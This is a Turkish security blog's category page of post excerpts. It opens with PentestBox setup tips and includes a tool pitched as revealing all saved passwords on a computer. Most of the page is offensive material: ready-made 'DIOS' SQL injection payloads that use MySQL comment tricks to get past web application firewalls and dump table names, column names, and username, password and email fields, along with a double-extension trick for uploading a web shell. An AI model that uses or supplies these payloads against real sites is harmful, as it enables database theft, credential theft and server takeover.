İçeriğe geç
xxxxx1

Kategori: Güvenlik

fatih üst

PentestBox Çalışma Hatası pentest box ‘sqlmap’ is not recognized as an internal or external command, operable program or batch file.

PentestBox üzerinde ilk kurulum sonrası bazı sistemlerde örneğin sqlmap uygulamasını çalıştırmayı denediniz aşağıdaki gibi bir hata alabilirsiniz. Bunun çözümü çok basit. pentest box ‘atom’ is not recognized as an internal…

fatih altfatih üst

Windows Ortamında Linux Araçlarının Kullanımı – PentestBox Tools

Sistemler üzerinde güvenlik açığı testi yapan hemen hemen bir çok kullanıcı Windows İşletim sisteminde sanal makineler üzerine Linux İşletim sistemi kurularak Linux’ un sunmuş olduğu imkanlardan faydalanır. Windows üzerinde Sanal Makine ile çalışırken bilgisayarımızda aşırı şekilde Bellek ve Cpu kullanımına…

fatih altfatih üst

Bilgisayarda Kayıtlı Tüm Şifreleri Bulun

Kayıtlı Tüm Şifreleri Bulun

Teknolojinin gelişmesiyle hayatımızı kolaylaştıran yazılımlardan tutun sosyal medya hesaplarına kadar bir çok platforma kişisel oturumlarımızı açmamız gerekiyor. Tabiki bunun için her birine ayrı bir şifre oluşturmamız güvenlik amacıyla önemli. Oluşturduğunuz şifreleri daha sonra hatırla işaretleyip geçiyorsunuz. Peki nasıl hatırlayacaksınız? İşte tam burada yazılımımız devreye giriyor ve kayıtlı tüm şifreleri karşımıza çıkarıyor.

    fatih altfatih üst

    403 Forbidden DİOS WAF BYPASS

    403 Forbidden Access to this resource on the server is denied! DİOS WAF TABLO İSİMLERİNİ ÇEKMEK İÇİN  PHP Kod: index.php?id=35′ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c​62723e,/*!50000table_name*/)),@))+,2,3,4– –  DİOS WAF KOLON İSİMLERİ ÇEKMEK İÇİN PHP Kod: index.php?id=35’ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.columns*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c​62723e,/*!50000column_name*/)),@))+,2,3,4– –   …

    fatih altfatih üst
    fatih altfatih üst
    fatih altfatih üst

    Shell Upload Bypass

    Shell upload bypass Kod: http://site.com/shell.txt editleyip kendi shell yolunuzu txt olarak ekleyin düzenlenen php dosyasını servera upload edin. Aynı dosyanın bulunduğu url de shell.png.phtml.pHP olarak shelliniz yüklenmiş olacaktır.

    fatih altfatih üst
    fatih altfatih üst

    DİOS WAF Sql İnjection Bypass

    TABLO ADI VE KOLON ADI BİLGİLERİNİ ÇIKARIR (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(/*!50000iNfoRMaTioN_ScHeMa.coLumNs*/)wHeRe(TaBLe_ScHeMa!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,TaBLe_NaMe,0x203a3a20,CoLumN_NaMe))))x) M KOLONDAKİ BİLGİLERİ ÇEKER (SeLecT(@x)FrOm(SeLecT(@x:=0x00),(SeLecT(@x)FrOm(usercontrol)wHeRe(0x00)in(@x:=/*!50000CoNcaT*/(@x,0x3c62723e,kulladi,0x203a3a20,kullsif,0x203a3a20,email))))x)

    fatih alt